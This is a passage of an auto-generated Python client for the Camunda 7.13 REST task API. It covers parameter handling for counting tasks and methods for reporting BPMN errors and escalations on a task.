:param str follow_up_after_expression: Restrict to tasks that have a followUp date after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before: Restrict to tasks that have a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.234+0200`.
:param str follow_up_before_expression: Restrict to tasks that have a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str follow_up_before_or_not_existent: Restrict to tasks that have no followUp date or a followUp date before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.432+0200`. The typical use case is to query all `active` tasks for a user for a given date.
:param str follow_up_before_or_not_existent_expression: Restrict to tasks that have no followUp date or a followUp date before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_on: Restrict to tasks that were created on the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.324+0200`.
:param str created_on_expression: Restrict to tasks that were created on the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_after: Restrict to tasks that were created after the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.342+0200`.
:param str created_after_expression: Restrict to tasks that were created after the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str created_before: Restrict to tasks that were created before the given date. By [default](https://docs.camunda.org/manual/7.13/reference/rest/overview/date-format/), the date must have the format `yyyy-MM-dd'T'HH:mm:ss.SSSZ`, e.g., `2013-01-23T14:42:45.332+0200`.
:param str created_before_expression: Restrict to tasks that were created before the date described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to a `java.util.Date` or `org.joda.time.DateTime` object.
:param str delegation_state: Restrict to tasks that are in the given delegation state. Valid values are `PENDING` and `RESOLVED`.
:param str candidate_groups: Restrict to tasks that are offered to any of the given candidate groups. Takes a comma-separated list of group names, so for example `developers,support,sales`.
:param str candidate_groups_expression: Restrict to tasks that are offered to any of the candidate groups described by the given expression. See the [user guide](https://docs.camunda.org/manual/7.13/user-guide/process-engine/expression-language/#internal-context-functions) for more information on available functions. The expression must evaluate to `java.util.List` of Strings.
:param bool with_candidate_groups: Only include tasks which have a candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_groups: Only include tasks which have no candidate group. Value may only be `true`, as `false` is the default behavior.
:param bool with_candidate_users: Only include tasks which have a candidate user. Value may only be `true`, as `false` is the default behavior.
:param bool without_candidate_users: Only include tasks which have no candidate users. Value may only be `true`, as `false` is the default behavior.
:param bool active: Only include active tasks. Value may only be `true`, as `false` is the default behavior.
:param bool suspended: Only include suspended tasks. Value may only be `true`, as `false` is the default behavior.
:param str task_variables: Only include tasks that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str process_variables: Only include tasks that belong to process instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param str case_instance_variables: Only include tasks that belong to case instances that have variables with certain values. Variable filtering expressions are comma-separated and are structured as follows: A valid parameter value has the form `key_operator_value`. `key` is the variable name, `operator` is the comparison operator to be used and `value` the variable value. **Note**: Values are always treated as String objects on server side. Valid `operator` values are: `eq` - equal to; `neq` - not equal to; `gt` - greater than; `gteq` - greater than or equal to; `lt` - lower than; `lteq` - lower than or equal to; `like`. `key` and `value` may not contain underscore or comma characters.
:param bool variable_names_ignore_case: Match all variable names in this query case-insensitively. If set `variableName` and `variablename` are treated as equal.
:param bool variable_values_ignore_case: Match all variable values in this query case-insensitively. If set `variableValue` and `variablevalue` are treated as equal.
:param str parent_task_id: Restrict query to all tasks that are sub tasks of the given task. Takes a task id.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(CountResultDto, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'process_instance_id',
'process_instance_id_in',
'process_instance_business_key',
'process_instance_business_key_expression',
'process_instance_business_key_in',
'process_instance_business_key_like',
'process_instance_business_key_like_expression',
'process_definition_id',
'process_definition_key',
'process_definition_key_in',
'process_definition_name',
'process_definition_name_like',
'execution_id',
'case_instance_id',
'case_instance_business_key',
'case_instance_business_key_like',
'case_definition_id',
'case_definition_key',
'case_definition_name',
'case_definition_name_like',
'case_execution_id',
'activity_instance_id_in',
'tenant_id_in',
'without_tenant_id',
'assignee',
'assignee_expression',
'assignee_like',
'assignee_like_expression',
'assignee_in',
'owner',
'owner_expression',
'candidate_group',
'candidate_group_expression',
'candidate_user',
'candidate_user_expression',
'include_assigned_tasks',
'involved_user',
'involved_user_expression',
'assigned',
'unassigned',
'task_definition_key',
'task_definition_key_in',
'task_definition_key_like',
'name',
'name_not_equal',
'name_like',
'name_not_like',
'description',
'description_like',
'priority',
'max_priority',
'min_priority',
'due_date',
'due_date_expression',
'due_after',
'due_after_expression',
'due_before',
'due_before_expression',
'follow_up_date',
'follow_up_date_expression',
'follow_up_after',
'follow_up_after_expression',
'follow_up_before',
'follow_up_before_expression',
'follow_up_before_or_not_existent',
'follow_up_before_or_not_existent_expression',
'created_on',
'created_on_expression',
'created_after',
'created_after_expression',
'created_before',
'created_before_expression',
'delegation_state',
'candidate_groups',
'candidate_groups_expression',
'with_candidate_groups',
'without_candidate_groups',
'with_candidate_users',
'without_candidate_users',
'active',
'suspended',
'task_variables',
'process_variables',
'case_instance_variables',
'variable_names_ignore_case',
'variable_values_ignore_case',
'parent_task_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_tasks_count" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'process_instance_id' in local_var_params and local_var_params['process_instance_id'] is not None: # noqa: E501
query_params.append(('processInstanceId', local_var_params['process_instance_id'])) # noqa: E501
if 'process_instance_id_in' in local_var_params and local_var_params['process_instance_id_in'] is not None: # noqa: E501
query_params.append(('processInstanceIdIn', local_var_params['process_instance_id_in'])) # noqa: E501
if 'process_instance_business_key' in local_var_params and local_var_params['process_instance_business_key'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKey', local_var_params['process_instance_business_key'])) # noqa: E501
if 'process_instance_business_key_expression' in local_var_params and local_var_params['process_instance_business_key_expression'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyExpression', local_var_params['process_instance_business_key_expression'])) # noqa: E501
if 'process_instance_business_key_in' in local_var_params and local_var_params['process_instance_business_key_in'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyIn', local_var_params['process_instance_business_key_in'])) # noqa: E501
if 'process_instance_business_key_like' in local_var_params and local_var_params['process_instance_business_key_like'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyLike', local_var_params['process_instance_business_key_like'])) # noqa: E501
if 'process_instance_business_key_like_expression' in local_var_params and local_var_params['process_instance_business_key_like_expression'] is not None: # noqa: E501
query_params.append(('processInstanceBusinessKeyLikeExpression', local_var_params['process_instance_business_key_like_expression'])) # noqa: E501
if 'process_definition_id' in local_var_params and local_var_params['process_definition_id'] is not None: # noqa: E501
query_params.append(('processDefinitionId', local_var_params['process_definition_id'])) # noqa: E501
if 'process_definition_key' in local_var_params and local_var_params['process_definition_key'] is not None: # noqa: E501
query_params.append(('processDefinitionKey', local_var_params['process_definition_key'])) # noqa: E501
if 'process_definition_key_in' in local_var_params and local_var_params['process_definition_key_in'] is not None: # noqa: E501
query_params.append(('processDefinitionKeyIn', local_var_params['process_definition_key_in'])) # noqa: E501
if 'process_definition_name' in local_var_params and local_var_params['process_definition_name'] is not None: # noqa: E501
query_params.append(('processDefinitionName', local_var_params['process_definition_name'])) # noqa: E501
if 'process_definition_name_like' in local_var_params and local_var_params['process_definition_name_like'] is not None: # noqa: E501
query_params.append(('processDefinitionNameLike', local_var_params['process_definition_name_like'])) # noqa: E501
if 'execution_id' in local_var_params and local_var_params['execution_id'] is not None: # noqa: E501
query_params.append(('executionId', local_var_params['execution_id'])) # noqa: E501
if 'case_instance_id' in local_var_params and local_var_params['case_instance_id'] is not None: # noqa: E501
query_params.append(('caseInstanceId', local_var_params['case_instance_id'])) # noqa: E501
if 'case_instance_business_key' in local_var_params and local_var_params['case_instance_business_key'] is not None: # noqa: E501
query_params.append(('caseInstanceBusinessKey', local_var_params['case_instance_business_key'])) # noqa: E501
if 'case_instance_business_key_like' in local_var_params and local_var_params['case_instance_business_key_like'] is not None: # noqa: E501
query_params.append(('caseInstanceBusinessKeyLike', local_var_params['case_instance_business_key_like'])) # noqa: E501
if 'case_definition_id' in local_var_params and local_var_params['case_definition_id'] is not None: # noqa: E501
query_params.append(('caseDefinitionId', local_var_params['case_definition_id'])) # noqa: E501
if 'case_definition_key' in local_var_params and local_var_params['case_definition_key'] is not None: # noqa: E501
query_params.append(('caseDefinitionKey', local_var_params['case_definition_key'])) # noqa: E501
if 'case_definition_name' in local_var_params and local_var_params['case_definition_name'] is not None: # noqa: E501
query_params.append(('caseDefinitionName', local_var_params['case_definition_name'])) # noqa: E501
if 'case_definition_name_like' in local_var_params and local_var_params['case_definition_name_like'] is not None: # noqa: E501
query_params.append(('caseDefinitionNameLike', local_var_params['case_definition_name_like'])) # noqa: E501
if 'case_execution_id' in local_var_params and local_var_params['case_execution_id'] is not None: # noqa: E501
query_params.append(('caseExecutionId', local_var_params['case_execution_id'])) # noqa: E501
if 'activity_instance_id_in' in local_var_params and local_var_params['activity_instance_id_in'] is not None: # noqa: E501
query_params.append(('activityInstanceIdIn', local_var_params['activity_instance_id_in'])) # noqa: E501
if 'tenant_id_in' in local_var_params and local_var_params['tenant_id_in'] is not None: # noqa: E501
query_params.append(('tenantIdIn', local_var_params['tenant_id_in'])) # noqa: E501
if 'without_tenant_id' in local_var_params and local_var_params['without_tenant_id'] is not None: # noqa: E501
query_params.append(('withoutTenantId', local_var_params['without_tenant_id'])) # noqa: E501
if 'assignee' in local_var_params and local_var_params['assignee'] is not None: # noqa: E501
query_params.append(('assignee', local_var_params['assignee'])) # noqa: E501
if 'assignee_expression' in local_var_params and local_var_params['assignee_expression'] is not None: # noqa: E501
query_params.append(('assigneeExpression', local_var_params['assignee_expression'])) # noqa: E501
if 'assignee_like' in local_var_params and local_var_params['assignee_like'] is not None: # noqa: E501
query_params.append(('assigneeLike', local_var_params['assignee_like'])) # noqa: E501
if 'assignee_like_expression' in local_var_params and local_var_params['assignee_like_expression'] is not None: # noqa: E501
query_params.append(('assigneeLikeExpression', local_var_params['assignee_like_expression'])) # noqa: E501
if 'assignee_in' in local_var_params and local_var_params['assignee_in'] is not None: # noqa: E501
query_params.append(('assigneeIn', local_var_params['assignee_in'])) # noqa: E501
if 'owner' in local_var_params and local_var_params['owner'] is not None: # noqa: E501
query_params.append(('owner', local_var_params['owner'])) # noqa: E501
if 'owner_expression' in local_var_params and local_var_params['owner_expression'] is not None: # noqa: E501
query_params.append(('ownerExpression', local_var_params['owner_expression'])) # noqa: E501
if 'candidate_group' in local_var_params and local_var_params['candidate_group'] is not None: # noqa: E501
query_params.append(('candidateGroup', local_var_params['candidate_group'])) # noqa: E501
if 'candidate_group_expression' in local_var_params and local_var_params['candidate_group_expression'] is not None: # noqa: E501
query_params.append(('candidateGroupExpression', local_var_params['candidate_group_expression'])) # noqa: E501
if 'candidate_user' in local_var_params and local_var_params['candidate_user'] is not None: # noqa: E501
query_params.append(('candidateUser', local_var_params['candidate_user'])) # noqa: E501
if 'candidate_user_expression' in local_var_params and local_var_params['candidate_user_expression'] is not None: # noqa: E501
query_params.append(('candidateUserExpression', local_var_params['candidate_user_expression'])) # noqa: E501
if 'include_assigned_tasks' in local_var_params and local_var_params['include_assigned_tasks'] is not None: # noqa: E501
query_params.append(('includeAssignedTasks', local_var_params['include_assigned_tasks'])) # noqa: E501
if 'involved_user' in local_var_params and local_var_params['involved_user'] is not None: # noqa: E501
query_params.append(('involvedUser', local_var_params['involved_user'])) # noqa: E501
if 'involved_user_expression' in local_var_params and local_var_params['involved_user_expression'] is not None: # noqa: E501
query_params.append(('involvedUserExpression', local_var_params['involved_user_expression'])) # noqa: E501
if 'assigned' in local_var_params and local_var_params['assigned'] is not None: # noqa: E501
query_params.append(('assigned', local_var_params['assigned'])) # noqa: E501
if 'unassigned' in local_var_params and local_var_params['unassigned'] is not None: # noqa: E501
query_params.append(('unassigned', local_var_params['unassigned'])) # noqa: E501
if 'task_definition_key' in local_var_params and local_var_params['task_definition_key'] is not None: # noqa: E501
query_params.append(('taskDefinitionKey', local_var_params['task_definition_key'])) # noqa: E501
if 'task_definition_key_in' in local_var_params and local_var_params['task_definition_key_in'] is not None: # noqa: E501
query_params.append(('taskDefinitionKeyIn', local_var_params['task_definition_key_in'])) # noqa: E501
if 'task_definition_key_like' in local_var_params and local_var_params['task_definition_key_like'] is not None: # noqa: E501
query_params.append(('taskDefinitionKeyLike', local_var_params['task_definition_key_like'])) # noqa: E501
if 'name' in local_var_params and local_var_params['name'] is not None: # noqa: E501
query_params.append(('name', local_var_params['name'])) # noqa: E501
if 'name_not_equal' in local_var_params and local_var_params['name_not_equal'] is not None: # noqa: E501
query_params.append(('nameNotEqual', local_var_params['name_not_equal'])) # noqa: E501
if 'name_like' in local_var_params and local_var_params['name_like'] is not None: # noqa: E501
query_params.append(('nameLike', local_var_params['name_like'])) # noqa: E501
if 'name_not_like' in local_var_params and local_var_params['name_not_like'] is not None: # noqa: E501
query_params.append(('nameNotLike', local_var_params['name_not_like'])) # noqa: E501
if 'description' in local_var_params and local_var_params['description'] is not None: # noqa: E501
query_params.append(('description', local_var_params['description'])) # noqa: E501
if 'description_like' in local_var_params and local_var_params['description_like'] is not None: # noqa: E501
query_params.append(('descriptionLike', local_var_params['description_like'])) # noqa: E501
if 'priority' in local_var_params and local_var_params['priority'] is not None: # noqa: E501
query_params.append(('priority', local_var_params['priority'])) # noqa: E501
if 'max_priority' in local_var_params and local_var_params['max_priority'] is not None: # noqa: E501
query_params.append(('maxPriority', local_var_params['max_priority'])) # noqa: E501
if 'min_priority' in local_var_params and local_var_params['min_priority'] is not None: # noqa: E501
query_params.append(('minPriority', local_var_params['min_priority'])) # noqa: E501
if 'due_date' in local_var_params and local_var_params['due_date'] is not None: # noqa: E501
query_params.append(('dueDate', local_var_params['due_date'])) # noqa: E501
if 'due_date_expression' in local_var_params and local_var_params['due_date_expression'] is not None: # noqa: E501
query_params.append(('dueDateExpression', local_var_params['due_date_expression'])) # noqa: E501
if 'due_after' in local_var_params and local_var_params['due_after'] is not None: # noqa: E501
query_params.append(('dueAfter', local_var_params['due_after'])) # noqa: E501
if 'due_after_expression' in local_var_params and local_var_params['due_after_expression'] is not None: # noqa: E501
query_params.append(('dueAfterExpression', local_var_params['due_after_expression'])) # noqa: E501
if 'due_before' in local_var_params and local_var_params['due_before'] is not None: # noqa: E501
query_params.append(('dueBefore', local_var_params['due_before'])) # noqa: E501
if 'due_before_expression' in local_var_params and local_var_params['due_before_expression'] is not None: # noqa: E501
query_params.append(('dueBeforeExpression', local_var_params['due_before_expression'])) # noqa: E501
if 'follow_up_date' in local_var_params and local_var_params['follow_up_date'] is not None: # noqa: E501
query_params.append(('followUpDate', local_var_params['follow_up_date'])) # noqa: E501
if 'follow_up_date_expression' in local_var_params and local_var_params['follow_up_date_expression'] is not None: # noqa: E501
query_params.append(('followUpDateExpression', local_var_params['follow_up_date_expression'])) # noqa: E501
if 'follow_up_after' in local_var_params and local_var_params['follow_up_after'] is not None: # noqa: E501
query_params.append(('followUpAfter', local_var_params['follow_up_after'])) # noqa: E501
if 'follow_up_after_expression' in local_var_params and local_var_params['follow_up_after_expression'] is not None: # noqa: E501
query_params.append(('followUpAfterExpression', local_var_params['follow_up_after_expression'])) # noqa: E501
if 'follow_up_before' in local_var_params and local_var_params['follow_up_before'] is not None: # noqa: E501
query_params.append(('followUpBefore', local_var_params['follow_up_before'])) # noqa: E501
if 'follow_up_before_expression' in local_var_params and local_var_params['follow_up_before_expression'] is not None: # noqa: E501
query_params.append(('followUpBeforeExpression', local_var_params['follow_up_before_expression'])) # noqa: E501
if 'follow_up_before_or_not_existent' in local_var_params and local_var_params['follow_up_before_or_not_existent'] is not None: # noqa: E501
query_params.append(('followUpBeforeOrNotExistent', local_var_params['follow_up_before_or_not_existent'])) # noqa: E501
if 'follow_up_before_or_not_existent_expression' in local_var_params and local_var_params['follow_up_before_or_not_existent_expression'] is not None: # noqa: E501
query_params.append(('followUpBeforeOrNotExistentExpression', local_var_params['follow_up_before_or_not_existent_expression'])) # noqa: E501
if 'created_on' in local_var_params and local_var_params['created_on'] is not None: # noqa: E501
query_params.append(('createdOn', local_var_params['created_on'])) # noqa: E501
if 'created_on_expression' in local_var_params and local_var_params['created_on_expression'] is not None: # noqa: E501
query_params.append(('createdOnExpression', local_var_params['created_on_expression'])) # noqa: E501
if 'created_after' in local_var_params and local_var_params['created_after'] is not None: # noqa: E501
query_params.append(('createdAfter', local_var_params['created_after'])) # noqa: E501
if 'created_after_expression' in local_var_params and local_var_params['created_after_expression'] is not None: # noqa: E501
query_params.append(('createdAfterExpression', local_var_params['created_after_expression'])) # noqa: E501
if 'created_before' in local_var_params and local_var_params['created_before'] is not None: # noqa: E501
query_params.append(('createdBefore', local_var_params['created_before'])) # noqa: E501
if 'created_before_expression' in local_var_params and local_var_params['created_before_expression'] is not None: # noqa: E501
query_params.append(('createdBeforeExpression', local_var_params['created_before_expression'])) # noqa: E501
if 'delegation_state' in local_var_params and local_var_params['delegation_state'] is not None: # noqa: E501
query_params.append(('delegationState', local_var_params['delegation_state'])) # noqa: E501
if 'candidate_groups' in local_var_params and local_var_params['candidate_groups'] is not None: # noqa: E501
query_params.append(('candidateGroups', local_var_params['candidate_groups'])) # noqa: E501
if 'candidate_groups_expression' in local_var_params and local_var_params['candidate_groups_expression'] is not None: # noqa: E501
query_params.append(('candidateGroupsExpression', local_var_params['candidate_groups_expression'])) # noqa: E501
if 'with_candidate_groups' in local_var_params and local_var_params['with_candidate_groups'] is not None: # noqa: E501
query_params.append(('withCandidateGroups', local_var_params['with_candidate_groups'])) # noqa: E501
if 'without_candidate_groups' in local_var_params and local_var_params['without_candidate_groups'] is not None: # noqa: E501
query_params.append(('withoutCandidateGroups', local_var_params['without_candidate_groups'])) # noqa: E501
if 'with_candidate_users' in local_var_params and local_var_params['with_candidate_users'] is not None: # noqa: E501
query_params.append(('withCandidateUsers', local_var_params['with_candidate_users'])) # noqa: E501
if 'without_candidate_users' in local_var_params and local_var_params['without_candidate_users'] is not None: # noqa: E501
query_params.append(('withoutCandidateUsers', local_var_params['without_candidate_users'])) # noqa: E501
if 'active' in local_var_params and local_var_params['active'] is not None: # noqa: E501
query_params.append(('active', local_var_params['active'])) # noqa: E501
if 'suspended' in local_var_params and local_var_params['suspended'] is not None: # noqa: E501
query_params.append(('suspended', local_var_params['suspended'])) # noqa: E501
if 'task_variables' in local_var_params and local_var_params['task_variables'] is not None: # noqa: E501
query_params.append(('taskVariables', local_var_params['task_variables'])) # noqa: E501
if 'process_variables' in local_var_params and local_var_params['process_variables'] is not None: # noqa: E501
query_params.append(('processVariables', local_var_params['process_variables'])) # noqa: E501
if 'case_instance_variables' in local_var_params and local_var_params['case_instance_variables'] is not None: # noqa: E501
query_params.append(('caseInstanceVariables', local_var_params['case_instance_variables'])) # noqa: E501
if 'variable_names_ignore_case' in local_var_params and local_var_params['variable_names_ignore_case'] is not None: # noqa: E501
query_params.append(('variableNamesIgnoreCase', local_var_params['variable_names_ignore_case'])) # noqa: E501
if 'variable_values_ignore_case' in local_var_params and local_var_params['variable_values_ignore_case'] is not None: # noqa: E501
query_params.append(('variableValuesIgnoreCase', local_var_params['variable_values_ignore_case'])) # noqa: E501
if 'parent_task_id' in local_var_params and local_var_params['parent_task_id'] is not None: # noqa: E501
query_params.append(('parentTaskId', local_var_params['parent_task_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/count', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CountResultDto', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def handle_bpmn_error(self, id, **kwargs): # noqa: E501
"""handle_bpmn_error # noqa: E501
Reports a business error in the context of a running task by id. The error code must be specified to identify the BPMN error handler. See the documentation for [Reporting Bpmn Error](https://docs.camunda.org/manual/7.13/reference/bpmn20/tasks/user-task/#reporting-bpmn-error) in User Tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.handle_bpmn_error(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task a BPMN error is reported for. (required)
:param TaskBpmnErrorDto task_bpmn_error_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.handle_bpmn_error_with_http_info(id, **kwargs) # noqa: E501
def handle_bpmn_error_with_http_info(self, id, **kwargs): # noqa: E501
"""handle_bpmn_error # noqa: E501
Reports a business error in the context of a running task by id. The error code must be specified to identify the BPMN error handler. See the documentation for [Reporting Bpmn Error](https://docs.camunda.org/manual/7.13/reference/bpmn20/tasks/user-task/#reporting-bpmn-error) in User Tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.handle_bpmn_error_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task a BPMN error is reported for. (required)
:param TaskBpmnErrorDto task_bpmn_error_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'task_bpmn_error_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method handle_bpmn_error" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `handle_bpmn_error`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_bpmn_error_dto' in local_var_params:
body_params = local_var_params['task_bpmn_error_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/bpmnError', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def handle_escalation(self, id, **kwargs): # noqa: E501
"""handle_escalation # noqa: E501
Reports an escalation in the context of a running task by id. The escalation code must be specified to identify the escalation handler. See the documentation for [Reporting Bpmn Escalation](https://docs.camunda.org/manual/7.13/reference/bpmn20/tasks/user-task/#reporting-bpmn-escalation) in User Tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.handle_escalation(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task in which context a BPMN escalation is reported. (required)
:param TaskEscalationDto task_escalation_dto:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.handle_escalation_with_http_info(id, **kwargs) # noqa: E501
def handle_escalation_with_http_info(self, id, **kwargs): # noqa: E501
"""handle_escalation # noqa: E501
Reports an escalation in the context of a running task by id. The escalation code must be specified to identify the escalation handler. See the documentation for [Reporting Bpmn Escalation](https://docs.camunda.org/manual/7.13/reference/bpmn20/tasks/user-task/#reporting-bpmn-escalation) in User Tasks. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.handle_escalation_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str id: The id of the task in which context a BPMN escalation is reported. (required)
:param TaskEscalationDto task_escalation_dto:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'id',
'task_escalation_dto'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method handle_escalation" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `handle_escalation`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'task_escalation_dto' in local_var_params:
body_params = local_var_params['task_escalation_dto']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/task/{id}/bpmnEscalation', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def query_tasks(self, **kwargs): # noqa: E501
"""query_tasks # noqa: E501
